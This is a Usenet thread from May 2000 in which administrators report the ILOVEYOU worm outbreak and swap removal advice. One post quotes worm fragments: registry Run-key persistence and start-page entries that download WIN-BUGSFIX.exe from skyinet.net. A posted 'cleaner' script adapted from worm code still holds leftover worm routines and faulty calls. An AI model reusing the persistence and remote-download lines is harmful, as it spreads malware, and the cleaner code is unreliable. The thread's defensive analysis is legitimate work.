Heads up - new virus alert - LoveBug virus
Alex at Starlabs
and the text: kindly check the attached LOVELETTER coming from me
and the attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
Needless to say, running the attachment infects your PC, which
will mass-mail out to your address book.
However, a-la-Kak, the email also contains javascript which
will infect your PC unless you have hardened Outlook.
The virus attempt to download components from websites
hosted by www.skyinet.net Analysis of these components is
ongoing.
Initial analysis also indicates that the virus can also spread
by IRC.
This is already very widespread. We have seen over 500
instances in the last hour.
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Alex Shipp
Imagineer
Messagelabs
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Juergen Nieveler
<3911...@devnews.star.net.uk>:
>...comes in an email with the subject line: ILOVEYOU
>and the text: kindly check the attached LOVELETTER coming from me
>and the attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
>
The Lovebug has arrived in Germany. Looks like a really cute one, too :-(
Javascript, downloading a Trojan, mIRC-Script... anybody got news?
--
Juergen Nieveler
Support the ban of Dihydrogen Monoxide: http://www.dhmo.org/
"The people united can never be ignited!"- Sgt. Colon, Ankh-Morpork Watch
PGP-Key available under www.netcologne.de/~nc-nievelju/
Nick Cole
: ash...@starlabs.net (Alex at Starlabs) wrote in
: <3911...@devnews.star.net.uk>:
It arrived at our site (UK) about an hour ago :-(
--
Nick Cole, PC Support, University of Cambridge, MIS Division
Email: NE...@CAM.AC.UK Tel: 01223 526667 (H) : 01223 766172 (W)
Morbius
news:8eri8g$smr$1...@pegasus.csx.cam.ac.uk...
We've got it too.................looks like this one is going to be a
biggie!!!!!!!!!!!!
Morbius
le rayé
The stuff is spreading wild!
Let's wait for a solution
LS
* Sent from RemarQ http://www.remarq.com The Internet's Discussion Network *
The fastest and easiest way to search and participate in Usenet - Free!
Andy Harkin
And us.. F*ck. All global mail servers down currently..
Be on the news too I expect.
Andy
Sent via Deja.com http://www.deja.com/
Before you buy.
Geert Haustraete
"Morbius" <no_spam...@yahoo.co.uk> wrote:
> "Nick Cole" <ne...@cus.cam.ac.uk> wrote in message
> news:8eri8g$smr$1...@pegasus.csx.cam.ac.uk...
> > Juergen Nieveler <niev...@netcologne.de> wrote:
> > : ash...@starlabs.net (Alex at Starlabs) wrote in
> > : <3911...@devnews.star.net.uk>:
> >
> > :>...comes in an email with the subject line: ILOVEYOU
> > :>and the text: kindly check the attached LOVELETTER coming from me
> > :>and the attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
Belgium joins the club. Our mail servers are almost dying on the load.
will...@my-deja.com
Andy Harkin <andy_...@my-deja.com> wrote:
> In article <957435431.3382.0.nnrp-
08.d4...@news.demon.co.uk>,
> "Morbius" <no_spam...@yahoo.co.uk> wrote:
> > "Nick Cole" <ne...@cus.cam.ac.uk> wrote in
message
> > news:8eri8g$smr$1...@pegasus.csx.cam.ac.uk...
> > > Juergen Nieveler <niev...@netcologne.de>
wrote:
> > > : ash...@starlabs.net (Alex at Starlabs)
wrote in
> > > : <3911...@devnews.star.net.uk>:
> > >
> > > :>...comes in an email with the subject
line: ILOVEYOU
> > > :>and the text: kindly check the attached
LOVELETTER coming from me
> > > :>and the attachment: LOVE-LETTER-FOR-
YOU.TXT.vbs
I know of a few big companies in the Netherlands
who have turned their mailservers down. This is a
big one.....
Willem-Aad
Derry Hamilton
--
Derry Hamilton, ras...@tardis.ed.ac.uk
"I think your cats need tuning - according to a couple of quick measurements
on a recently calibrated reference cat, the dominant frequency of a correctly
adjusted cat should be 12Hz +/-20%." ===Lionel Lauer on a.s.r===
mcc...@my-deja.com
Luckily I was able to recognize it and delete it
from users mailbox before anyone got to work.
mcc...@my-deja.com
Jakester
So far, our method of dealing with it (in an office of 30)
was delete all the mails that contained the lovebug virus, in
the inbox, sent items and deleted items.
What this virus appears to do, from what I have been told and
from what I can see, is that on any infected computer that has
IE open, it downlaods, probably in the background, components
from the Sky-Inet site, which is made the default. When the
infected computers are open with IE, it places a massive strain
on our system. The only solution at the moment, as far as I can
see, for infected computers, is to wipe them and reinstall
everything. But don`t do that on my word - this is just what I
have found from talking to people, and what looks likely.
Hopefully there`ll be a less drastic solution. In the meantime,
all those at our company who have been infected are not allowed
to use IE. That's all we can do to stop our server being placed
under tremendous strain. We did reset our server as well, btw,
especially when processer usage was at 100%. It`s now down to
about 40 - 50%, which is still higher than usual.
Well, that`s what is happening here in London. My best wishes
to all throughout the world who have to deal with this.
Jake
P.S Apparently NTL has completely crashed because of it.
ander...@my-deja.com
"iloveyou" - It is all over the place...)
It says it was written by:
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / isp...@mail.com / @GRAMMERSoft Group / =
Manila,Philippines
It adds a few items to the Run command:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern
= el32",dirsystem&"\MSKernel32.vbs"
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServic
e= s\Win32DLL",dirwin&"\Win32DLL.vbs"
Contacts a few sites that look suspicously like porn:
age","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm
=
hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num =3D 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyq
w=
erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num =3D 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopB
d=
QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num =3D 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFS
D=
GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WI
N= -BUGSFIX.exe"
And then passes on the garbage to the happy recipients in your address
book...
And downloads an executable that also is put under Run:
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-B
U= GSFIX",downread&"\WIN-BUGSFIX.exe"
- Anders Gustafsson, Engineer, CNE5, ASE
NSC Volunteer Sysop (http://support.novell.com/forums/)
Pedago, The Aaland Islands (N60 E20)
Using VA 4.52 build 277 (32-bit) on Win95
Daniel Nickel
Alex at Starlabs <ash...@starlabs.net> schrieb in im Newsbeitrag:
3911...@devnews.star.net.uk...
> ...comes in an email with the subject line: ILOVEYOU
> and the text: kindly check the attached LOVELETTER coming from me
>
> Needless to say, running the attachment infects your PC, which
> will mass-mail out to your address book.
>
> However, a-la-Kak, the email also contains javascript which
> will infect your PC unless you have hardened Outlook.
>
> The virus attempt to download components from websites
> hosted by www.skyinet.net Analysis of these components is
> ongoing.
>
> Initial analysis also indicates that the virus can also spread
> by IRC.
>
>
> This is already very widespread. We have seen over 500
> instances in the last hour.
>
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Alex Shipp
> Imagineer
> Messagelabs
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
infected, mail servers down, registries done. What now?
Daniel
jank...@my-deja.com
"Alex at Starlabs" <ash...@starlabs.net> wrote:
> ...comes in an email with the subject line:
ILOVEYOU
> and the text: kindly check the attached
LOVELETTER coming from me
> and the attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
>
> Needless to say, running the attachment infects
your PC, which
> will mass-mail out to your address book.
And it will not stop even if you kill the process
or reboot the computer!
It also renames *.jpg to *.jpg.vbs and rewrites
files with virus script!
It infects only Microsoft products (Internet
Explorer, MS Outlook and Outlook Express) but not
Netscape!
There is no antivirus so far!
jank...@my-deja.com
steve_...@my-deja.com
Steve
In article <8erp38$dt...@ppd00021.deutschepost.de>,
"Daniel Nickel" <d.ni...@deutschepost.de> wrote:
>
> Alex at Starlabs <ash...@starlabs.net> schrieb in im Newsbeitrag:
> 3911...@devnews.star.net.uk...
> > ...comes in an email with the subject line: ILOVEYOU
> > and the text: kindly check the attached LOVELETTER coming from me
> > and the attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
> >
> > Needless to say, running the attachment infects your PC, which
> > will mass-mail out to your address book.
> >
> > However, a-la-Kak, the email also contains javascript which
> > will infect your PC unless you have hardened Outlook.
> >
> > The virus attempt to download components from websites
> > hosted by www.skyinet.net Analysis of these components is
> > ongoing.
> >
> > Initial analysis also indicates that the virus can also spread
> > by IRC.
> >
> >
> > This is already very widespread. We have seen over 500
> > instances in the last hour.
> >
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > Alex Shipp
> > Imagineer
> > Messagelabs
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> We been fully hit some 2 hours ago. All our bigger IT sites in
germany are
> infected, mail servers down, registries done. What now?
>
> Daniel
>
>
rod
"Nick Cole" <ne...@cus.cam.ac.uk> wrote in message
news:8eri8g$smr$1...@pegasus.csx.cam.ac.uk...
> Juergen Nieveler <niev...@netcologne.de> wrote:
> : ash...@starlabs.net (Alex at Starlabs) wrote in
> : <3911...@devnews.star.net.uk>:
>
> :>...comes in an email with the subject line: ILOVEYOU
> :>and the text: kindly check the attached LOVELETTER coming from me
> :>and the attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
> :>
>
> : The Lovebug has arrived in Germany. Looks like a really cute one, too :-(
>
> : Javascript, downloading a Trojan, mIRC-Script... anybody got news?
>
> : --
> : Juergen Nieveler
> : Support the ban of Dihydrogen Monoxide: http://www.dhmo.org/
> : "The people united can never be ignited!"- Sgt. Colon, Ankh-Morpork Watch
andré perso mac
http://www.teq-international.com/
and run the loverceaner.vbs
> De : jank...@my-deja.com
> Société : Deja.com - Before you buy.
> Groupes : alt.comp.virus
> Date : Thu, 04 May 2000 12:39:17 GMT
> Objet : Re: Heads up - new virus alert - LoveBug virus
>
> In article <3911...@devnews.star.net.uk>,
> "Alex at Starlabs" <ash...@starlabs.net> wrote:
>> ...comes in an email with the subject line:
> ILOVEYOU
>> and the text: kindly check the attached
> LOVELETTER coming from me
>> and the attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
>>
>> Needless to say, running the attachment infects
> your PC, which
>> will mass-mail out to your address book.
>
> And it will not stop even if you kill the process
> or reboot the computer!
>
> It also renames *.jpg to *.jpg.vbs and rewrites
> files with virus script!
>
> It infects only Microsoft products (Internet
> Explorer, MS Outlook and Outlook Express) but not
> Netscape!
>
> There is no antivirus so far!
>
>
Ian
Exchange 5/5.5 with service pack 3 contains a utility called ISSCAN.
Stop Information store service.
You need to create a definition file called iloveyou.txt containing the
following text:
MSG ILOVEYOU 2000/05/04
^
The above space is a TAB
Save the file in you exchsrvr/bin folder and run the following command
Isscan –pri –fix –test badmessage –c iloveyou.txt
And
Isscan –pub –fix –test basmessage –c iloveyou.txt
This will generate two log files containing information about what file
attachments were deleted named isscan.pub and isscan.prv respectively
The following attached script may be added to all login scripts to delete the
registry keys and files associated with this worm:
rem *** I love You virus cleaner (fast edit no guarantee) **
rem *** Copyright TEQ-nederland www.teq.nl (fvs)
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
on error resume next
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.delete(dirsystem&"\MSKernel32.vbs")
c.delete(dirwin&"\Win32DLL.vbs")
c.delete(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
c.delete(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT")
c.delete(dirsystem&"\LOVE-LETTER-FOR-YOU.HTM")
c.delete(dirtemp&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
c.delete(dirtemp&"\LOVE-LETTER-FOR-YOU.TXT")
regruns()
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",""
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",""
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN_BUGSFIX",""
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
This process only gets rid of current worm activity on your immediate server
information store and for clients that logon. If users use PST files to store
mail, they will still be affected. Educate your users not to open any
attachments with the subject line “ILOVEYOU” until a formal fix is introduced.
Fille
1/Execute the "regedit" program from "Start" menu/"Run..."
2/ Using this program, go in
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" and
remove the entry containing MSKernel32.vbs
3/ Do the same with
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices"
and Win32DLL.vbs
4/ Go in to the control panel and dubble click Internet Options delete the
home page adress and fill out a new adress to your own preference.
5/ The virus also infects files on network drives by writing the virus
script in files with those extensions: vbs, vbe, js, jse, css, wsh, sct,
hta, jpeg, jpg, mp3, mp2. You can check this by making a "Find" on every
network drive, looking for the string "loveletter" (in the
field "Containing
text:"). And erase al this files.
FB
Support Engineer
Alex at Starlabs wrote:
>
>
> ...comes in an email with the subject line: ILOVEYOU
> and the text: kindly check the attached LOVELETTER coming from me
> and the attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
>
> Needless to say, running the attachment infects your PC, which
> will mass-mail out to your address book.
>
> However, a-la-Kak, the email also contains javascript which
> will infect your PC unless you have hardened Outlook.
>
> The virus attempt to download components from websites
> hosted by www.skyinet.net Analysis of these components is
> ongoing.
>
> Initial analysis also indicates that the virus can also spread
> by IRC.
>
>
> This is already very widespread. We have seen over 500
> instances in the last hour.
>
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Alex Shipp
> Imagineer
> Messagelabs
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>
>
--
Posted via CNET Help.com
http://www.help.com/
Jeffro
sid
>It infects only Microsoft products (Internet
>Explorer, MS Outlook and Outlook Express) but not
>Netscape!
Um, are you sure about it affecting OE which is very different from Outlook?
Mira
<snip>
>
>5/ The virus also infects files on network drives by writing the virus
>script in files with those extensions: vbs, vbe, js, jse, css, wsh, sct,
>hta, jpeg, jpg, mp3, mp2. You can check this by making a "Find" on every
>network drive, looking for the string "loveletter" (in the
>field "Containing
>text:"). And erase al this files.
>
What's the meaning of rewriting picture and sound files? The don't
contain executable code. Only if their extension is changed to, but
this can be seen. Or am I wrong. I'm a sound engineer and I simply
don't want to lose all my data. (Btw you didn't mention wav files so I
suppose these can't be infected.
>
>FB
>Support Engineer
Henry Criss
> >
> What's the meaning of rewriting picture and sound files? The don't
> contain executable code. Only if their extension is changed to, but
> this can be seen. Or am I wrong. I'm a sound engineer and I simply
> don't want to lose all my data. (Btw you didn't mention wav files so I
> suppose these can't be infected.
> >
> >FB
> >Support Engineer
The virus also tries to use companion techniques, adding a secondary file
next to existing file - hoping that the user will click on the wrong
file.
This is done so that the virus locates files with jpg, jpeg, mp3 and mp2
and
adds a new file next to it. For example, a picture named "pic.jpg" will
cause a new file called "pic.jpg.vbs" to be created.
Henry
hcr...@earthlink.net
REDARMY70
doing a DCC send!!
Henry Criss <hcr...@earthlink.net> wrote in message
news:MPG.137d430b4...@news.earthlink.net...
kurt wismer
> On Thu, 04 May 2000 15:30:07 GMT, Fille <fbe...@hotmail.com> wrote:
>
> <snip>
> >
> >5/ The virus also infects files on network drives by writing the virus
> >script in files with those extensions: vbs, vbe, js, jse, css, wsh, sct,
> >hta, jpeg, jpg, mp3, mp2. You can check this by making a "Find" on every
> >network drive, looking for the string "loveletter" (in the
> >field "Containing
> >text:"). And erase al this files.
> >
> What's the meaning of rewriting picture and sound files? The don't
> contain executable code. Only if their extension is changed to, but
> this can be seen. Or am I wrong.
theoretically the change in extension can be seen, however under windows
explorer the default settings hide the extensions of known file types and
*.vbs happens to be one of those extensions that get hidden...
and you're right that picture and sound files don't generally contain
executable code - however in windows explorer they are viewed or launched
using the same action as executing a program - by double clicking on
them... and those overwritten files can be shared with other people to
spread the infection further (how many people check a *.jpg to make
sure it's still the *.jpg they thought it was before they send it off
to a friend?)...
> I'm a sound engineer and I simply
> don't want to lose all my data. (Btw you didn't mention wav files so I
> suppose these can't be infected.
they can still be damaged by viruses... if you don't want to lose your
data to viruses, consider adopting a backup policy...
--
"i'm gonna break,
i'm gonna break my,
i'm gonna break my rusty cage,
and run"
Alex Shipp
> don't want to lose all my data. (Btw you didn't mention wav files so I
> suppose these can't be infected.
Bad luck for all you picture engineers though...your files are gone.
Alex
Ben Myers
<3915...@devnews.star.net.uk>...
According to Symantec, "...users of Norton Systemworks will be able to
recover these files if NProtect is running at the time of
infection."(http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html
)
Ben